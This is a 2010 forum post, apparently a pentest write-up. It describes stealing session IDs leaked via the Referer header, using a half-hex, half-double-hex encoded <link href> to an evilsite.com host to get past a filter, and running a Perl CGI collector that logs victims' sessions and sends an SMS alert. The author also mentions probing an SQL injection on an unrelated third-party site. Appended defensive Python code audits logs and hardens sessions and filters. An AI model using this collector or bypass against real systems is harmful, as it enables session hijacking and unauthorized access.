fb1h2s
09-27-2010, 12:48 AM
Last week I was assigned a WPT, where I was assigned to check a web application.
Normally in WPTs you will find a lot of bugs if you spend some good time analyzing the application in and out. And tools like WebInspect and AppScan are also of good help to one extent.
But the application I was testing had some sort of filter which prevented the possibility of any sort of normal web application attack, and redirected all malicious requests to one common error page. And all tools were giving out too many false positives. And I was almost going mad.
It was a module where users could trade objects. And there were three types of users: Anonymous users, Manager users and, as always, a super user. Anyone could access the anonymous user as the username/password was open for all; after logging in as Anonymous you could trade your things with other users, provided the managers accept it, as all your submissions went via the manager users.
The application didn't use any cookies; instead it used a session ID, which was passed in on every request via the [GET] method:
http://site.com/usrpage/?userid={D8A349A7-3503-4283-A1AA-9406DB6EE9C5}
So what struck me was that the user session ID holds the authentication, and if I could get hold of another valid session I could be in that user's privileges. And the only possible way is by tracking the HTTP_REFERER value. And this could only be possible by making the administrator/manager click one of our links from the application. And then we could hijack the user session. For those who are not aware of what I am talking about, read a similar scenario:
http://fb1h2s.com/view.php?article_id=8
In order to achieve that, I needed to find an XSS in the section where I could post my data for the manager approval, or if I managed to send a hyperlink which when clicked, "boomed", my back-end program would store the session IDs.
But with the current filter, which was blocking all unwanted requests, it was hardly possible.
And I was all stuck at this part. I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time Vinay "vinnu" bro was online and was all ready to help :). I presented my scenario of the filter that I wanted to bypass, and he gave me a few cool tips, in which converting the payload string that was a hyperlink
<link href="http://evilsite.com/evilscript.py" />
bypassed the filter when half the string was hex encoded and the other half was double hexed :).
So now the first phase is done and I almost wasted one day :( .
Day 2:
Now I knew that I could send the managers a hyperlink and trick them into clicking the link, stating that it was some wonderful product review. But the problem was that I didn't know when the manager users would log in and administrate my stuff, and the sessions will remain valid only till the user clicks Logout. And I won't be able to stay online 24/7 waiting for the manager to come online.
Even though I stay online 3/4 of my time, I needed a better plan.
So I thought of writing an SMS alert application, which will send an SMS to my phone whenever the click was initiated :D. So I could come online immediately and use the sessions. I chose 160by2.com for this and planned to automate it via Perl CGI.
Why Perl? Because Apache was by default configured to handle Perl CGI, plus the Mechanize module in Perl is amazing.
While analyzing 160by2.com for automating the request I found an SQL injection in one of the POST methods and started playing around with it and wasted a few hours. And by night the code was all ready and I sent the hyperlink to the victims with a convincing text.
#!c:/perl/bin/perl.exe
#CGI perl woot woot by fb1h2s
use CGI;
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
# a CGI script must emit an HTTP header first, otherwise Apache reports a malformed response
print CGI->header();
#lets save session first: the Referer header carries the clicking user's session-bearing URL
open (MYFILE, '>>session.txt') or die "cannot open session.txt: $!";
print MYFILE "\t$ENV{HTTP_REFERER}\n\n";
print MYFILE "\t$ENV{HTTP_USER_AGENT}\n\n";
print MYFILE "\t$ENV{HTTP_ACCEPT}\n\n";
print MYFILE "\t$ENV{REMOTE_ADDR}\n\n";
close (MYFILE);
#inform the master via sms now
my $url = "http://160by2.com/";
my $mobileno = "mymobno"; #usernameno
my $password = "mypass"; #password
my $mobilewoot ="smstothisno"; #no to recive alert
my $woot_woot = " woot woot"; #msg text
# Mechanize keeps the 160by2 login cookie in its own jar across the requests below
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#my $output_page = $mech->content();
#print "$output_page";
# log in by filling the site's login form (form and field ids as observed on the site)
$mech->form_id('login_form');
$mech->field(htxt_UserName => $mobileno);
$mech->field(txt_Passwd => $password);
$mech->click();
# then fill and submit the compose form to send the alert SMS
$mech->get("http://www.160by2.com/compose_sms.aspx");
$mech->form_id('frmcompose');
$mech->field(txt_msg => $woot_woot);
$mech->field(txt_mobileno => $mobilewoot);
#//"figure the rest out "
$mech->click();
#my $output_page1 = $mech->content();
#print "$output_page1";
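From the defending side, the two things this post turns on are a session ID carried in the URL (so any external link the manager clicks hands it out in the Referer header) and a filter that inspects input after only one level of percent-decoding. Below is an added Python example, not code from the post or from fb1h2s, that audits NCSA combined-format access logs for session tokens in request URLs and Referers, builds the cookie and Referrer-Policy headers that keep the session out of URLs altogether, and contrasts a single-decode filter with one that decodes to a fixed point before matching. The log lines, the example.invalid host, the token regex and the blocklist rule are constructed assumptions; the GUID format and site.com come from the post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Matches the GUID-style token format shown in the post
# ({D8A349A7-3503-4283-A1AA-9406DB6EE9C5}); the format is an assumption.
SESSION_TOKEN_RE = re.compile(
    r"\{?[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}?")

# NCSA "combined" access-log format (constructed parser, not from the post).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample log lines; the token and host are the ones from the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Sep/2010:00:48:00 +0530] "GET /usrpage/?userid=%7BD8A349A7-3503-4283-A1AA-9406DB6EE9C5%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Sep/2010:00:48:09 +0530] "GET /trade/list HTTP/1.1" 200 2048 "http://site.com/usrpage/?userid=%7BD8A349A7-3503-4283-A1AA-9406DB6EE9C5%7D" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Sep/2010:00:49:00 +0530] "GET /about HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]


def session_tokens_in_url(url):
    """Return any session-looking tokens carried in the URL's query string."""
    found = []
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        found.extend(SESSION_TOKEN_RE.findall(value))
    return found


def audit_log(lines):
    """Flag entries whose request URL or Referer carries a session token.

    A token in the request target means the app still issues session IDs in
    URLs; a token in a Referer shows such a URL being handed on in a header,
    which is exactly what leaks it to any third-party site the user clicks to.
    Returns (client_ip, request_target, where_found) tuples.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        where = []
        if session_tokens_in_url(m["target"]):
            where.append("request-url")
        if m["referer"] != "-" and session_tokens_in_url(m["referer"]):
            where.append("referer")
        if where:
            findings.append((m["ip"], m["target"], tuple(where)))
    return findings


def hardened_session_headers(token):
    """Response headers that keep the session out of the URL entirely: an
    HttpOnly/Secure cookie, plus Referrer-Policy so the browser sends no
    Referer to other origins at all."""
    return {
        "Set-Cookie": f"session={token}; Path=/; HttpOnly; Secure; SameSite=Lax",
        "Referrer-Policy": "no-referrer",
    }


# --- the filter side: decode to a fixed point before applying the rule -------

BLOCKED_RE = re.compile(r"<\s*link\b|href\s*=", re.I)  # stand-in for the app's filter


def canonicalize(value, max_rounds=5):
    """Percent-decode until the value stops changing (bounded), so the filter
    inspects what the input finally becomes, not just its first layer."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def single_decode_filter_blocks(raw):
    """Models a filter that only sees the one decode the web server performs."""
    return BLOCKED_RE.search(unquote(raw)) is not None


def canonical_filter_blocks(raw):
    """The same rule applied after canonicalization."""
    return BLOCKED_RE.search(canonicalize(raw)) is not None


# Constructed inputs modelled on the post's <link href=...> string.
SINGLE_ENCODED = "%3Clink%20href%3D%22http%3A%2F%2Fexample.invalid%2Fa%22%20%2F%3E"
# First half encoded twice, second half once: the mix the post describes.
MIXED_ENCODED = "%253Clink%2520href%253D%22http%3A%2F%2Fexample.invalid%2Fa%22%20%2F%3E"


if __name__ == "__main__":
    for ip, target, where in audit_log(SAMPLE_LOG):
        print(f"{ip} {target} -> token in {', '.join(where)}")
    print("single-decode filter, single-encoded:", single_decode_filter_blocks(SINGLE_ENCODED))
    print("single-decode filter, mixed-encoded: ", single_decode_filter_blocks(MIXED_ENCODED))
    print("canonical filter, mixed-encoded:     ", canonical_filter_blocks(MIXED_ENCODED))
```

Run it directly to see the findings. The point of canonicalize is that the blocklist is unchanged; it is simply applied after the input has been normalised, which is the general fix for this class of bypass rather than a rule tuned to one string. The audit only finds what your own server logs show, so a clean result still means the session must move into a cookie before the leak is closed.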